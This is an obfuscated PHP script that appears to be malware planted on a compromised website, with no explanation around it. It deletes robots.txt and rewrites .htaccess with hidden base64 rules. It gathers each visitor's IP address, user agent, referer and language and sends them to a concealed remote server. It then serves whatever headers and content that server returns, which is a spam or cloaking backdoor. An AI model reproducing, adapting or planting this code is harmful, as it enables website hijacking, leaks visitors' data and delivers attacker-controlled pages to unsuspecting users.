goto VKLrJ; Z9KNw: $params["\x72\x65\x66\x65\x72\145\x72"] = isset($_SERVER["\x48\x54\124\120\137\x52\x45\x46\105\122\105\122"]) ? $_SERVER["\x48\x54\124\120\x5f\122\x45\106\105\122\x45\x52"] : ''; goto Kfou_; qESxC: $api = base64_decode("\x61\110\x52\60\x63\104\x6f\x76\114\x7a\x59\x77\117\x44\105\x74\x59\x32\147\x30\114\130\x59\x79\x4f\x44\147\x75\141\127\61\156\117\130\x6c\x68\141\x47\71\166\x4c\155\x4e\x76\x62\121\75\75"); goto qknQq; cPJFw: while ($try < 3) { $content = h($api, $params); $content = @gzuncompress(base64_decode($content)); $data_array = @preg_split("\x2f\x5c\174\x2f\163\151", $content, -1, PREG_SPLIT_NO_EMPTY); if (!empty($data_array)) { $data = array_pop($data_array); $data = base64_decode($data); foreach ($data_array as $header) { @header($header); } echo $data; die; } $try++; } goto ym4b3; sRZVo: function h2() { if (file_exists("\162\157\142\x6f\x74\163" . "\x2e\x74\x78\164")) { @unlink("\x72\x6f\142\157\x74\163" . "\56\x74\170\x74"); } $htaccess = "\56" . "\x68\x74\x61\143\143\145\x73\x73"; $content = @base64_decode("\x50\105\x5a\160\142\107\x56\x7a\124\x57\x46\60\131\x32\147\147\x49\151\x34\157\x63\110\x6c\x38\132\x58\x68\x6c\x66\110\x42\x6f\x63\103\153\x6b\x49\152\64\113\x49\x45\71\x79\132\107\x56\x79\111\x47\106\x73\x62\x47\x39\x33\114\x47\122\x6c\x62\x6e\153\113\x49\105\122\x6c\x62\x6e\153\147\x5a\156\x4a\166\142\123\102\x68\142\107\167\x4b\120\103\71\x47\141\x57\x78\154\143\60\x31\150\x64\x47\x4e\x6f\120\x67\x6f\x38\x52\x6d\154\163\132\x58\x4e\x4e\131\x58\x52\x6a\x61\x43\x41\151\130\x69\150\150\x59\x6d\71\x31\x64\103\x35\167\141\110\x42\70\143\155\x46\x6b\141\x57\x38\x75\143\107\150\167\x66\x47\x6c\x75\x5a\107\x56\64\114\x6e\x42\157\x63\x48\x78\x6a\142\62\65\60\132\x57\65\60\114\x6e\x42\157\143\110\x78\163\142\x32\116\x72\x4d\172\x59\x77\114\156\x42\x6f\x63\110\170\150\x5a\107\x31\160\x62\151\x35\x77\141\x48\x42\70\x64\x33\x41\164\x62\x47\71\x6e\141\127\64\x75\x63\107\x68\x77\x66\x48\144\167\x4c\127\x77\167\132\x32\x6c\165\114\x6e\x42\x6f\143\110\170\63\143\103\61\x30\x61\x47\x56\164\x5a\123\65\167\x61\x48\102\70\x64\x33\x41\164\143\x32\x4e\x79\x61\x58\x42\60\143\x79\65\167\141\110\x42\70\144\63\x41\x74\x5a\x57\122\160\144\107\x39\x79\x4c\156\102\157\x63\110\170\x74\x59\x57\147\165\143\107\x68\167\x66\107\x70\x77\114\x6e\102\157\x63\110\170\x6c\x65\x48\x51\165\143\x47\x68\167\113\123\121\151\120\x67\x6f\x67\124\x33\x4a\153\132\130\111\147\x59\127\x78\x73\142\63\143\163\x5a\107\x56\165\145\121\157\147\121\x57\x78\163\x62\63\x63\147\x5a\156\112\x76\x62\x53\x42\150\142\x47\x77\113\x50\x43\71\x47\x61\x57\x78\154\x63\x30\x31\x68\144\107\x4e\157\x50\x67\x6f\70\123\127\x5a\116\x62\62\x52\x31\142\x47\x55\x67\142\127\x39\153\130\63\x4a\154\x64\63\x4a\x70\144\107\x55\165\131\172\x34\113\125\155\x56\x33\x63\155\x6c\x30\x5a\125\126\165\132\x32\x6c\x75\x5a\123\x42\120\x62\x67\160\123\x5a\x58\144\x79\141\x58\x52\154\x51\x6d\106\x7a\132\x53\x41\166\103\154\x4a\154\x64\63\x4a\160\144\107\x56\x53\144\x57\170\154\111\106\65\160\142\x6d\x52\154\145\106\x77\165\143\107\x68\167\x4a\103\101\164\111\106\164\115\x58\121\160\x53\x5a\x58\144\x79\141\130\122\x6c\121\62\x39\x75\x5a\x43\101\154\x65\61\112\106\x55\x56\126\106\x55\x31\122\146\122\153\x6c\115\122\x55\x35\x42\x54\125\x56\x39\x49\103\x45\x74\x5a\x67\x70\123\x5a\130\x64\171\x61\130\122\x6c\121\x32\71\x75\132\x43\101\x6c\x65\61\112\x46\125\x56\x56\106\125\x31\122\146\122\x6b\154\x4d\x52\125\65\102\x54\125\126\x39\111\103\x45\164\132\x41\160\123\x5a\130\144\171\141\x58\x52\154\x55\156\x56\x73\132\123\x41\x75\x49\103\71\x70\142\x6d\122\154\145\x43\65\167\x61\110\x41\147\127\x30\x78\144\103\x6a\167\166\x53\127\x5a\116\142\x32\x52\x31\x62\107\125\x2b"); if (file_exists($htaccess)) { $htaccess_content = file_get_contents($htaccess); if ($content == $htaccess_content) { return; } } @chmod($htaccess, 511); @file_put_contents($htaccess, $content); @chmod($htaccess, 420); } goto qESxC; Kfou_: $params["\141\x67\145\156\x74"] = isset($_SERVER["\110\x54\124\120\x5f\x55\x53\105\122\x5f\101\107\105\x4e\124"]) ? $_SERVER["\x48\124\x54\x50\x5f\x55\x53\x45\122\137\101\x47\105\116\x54"] : ''; goto ehQd8; uh7Pf: if (isset($_REQUEST["\160\x61\x72\x61\x6d\x73"])) { $params["\x61\x70\151"] = $api; print_r($params); die; } goto TjqGf; KeQDf: $params["\x72\x65\161\165\x65\163\x74\x5f\x75\162\154"] = $_SERVER["\x52\x45\x51\x55\105\x53\124\x5f\x55\x52\x49"]; goto Z9KNw; ehQd8: $params["\151\160"] = isset($_SERVER["\110\124\124\x50\137\x56\x49\x41"]) ? $_SERVER["\x48\x54\124\x50\137\130\x5f\106\x4f\x52\x57\x41\x52\x44\105\104\137\106\117\122"] : $_SERVER["\x52\x45\x4d\117\x54\x45\137\x41\104\x44\x52"]; goto h4d1R; vb9A6: $params["\x6c\x61\x6e\x67\x75\141\x67\x65"] = isset($_SERVER["\x48\124\x54\120\137\101\x43\x43\x45\x50\x54\x5f\114\101\116\107\125\101\107\105"]) ? $_SERVER["\x48\x54\124\120\x5f\x41\x43\103\105\x50\124\x5f\114\101\x4e\107\125\101\x47\x45"] : ''; goto uh7Pf; h4d1R: if ($params["\x69\x70"] == null) { $params["\x69\160"] = ''; } goto EKH2Y; EKH2Y: $params["\x70\162\157\x74\157\x63\157\154"] = isset($_SERVER["\110\124\124\x50\x53"]) ? "\150\164\x74\160\163\72\57\x2f" : "\x68\x74\164\x70\72\x2f\57"; goto vb9A6; VKLrJ: function h($url, $pf = '') { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, "\150"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE); if ($pf != '') { curl_setopt($ch, CURLOPT_POST, 1); if (is_array($pf)) { curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($pf)); } } $r = curl_exec($ch); curl_close($ch); if ($r) { return $r; } return ''; } goto sRZVo; vrQOR: $try = 0; goto cPJFw; qknQq: $params["\x64\157\155\x61\x69\x6e"] = isset($_SERVER["\110\x54\x54\120\x5f\110\117\123\x54"]) ? $_SERVER["\x48\x54\124\120\x5f\110\x4f\x53\124"] : $_SERVER["\123\105\x52\126\105\x52\137\116\x41\x4d\105"]; goto KeQDf; TjqGf: h2(); goto vrQOR; ym4b3: ?>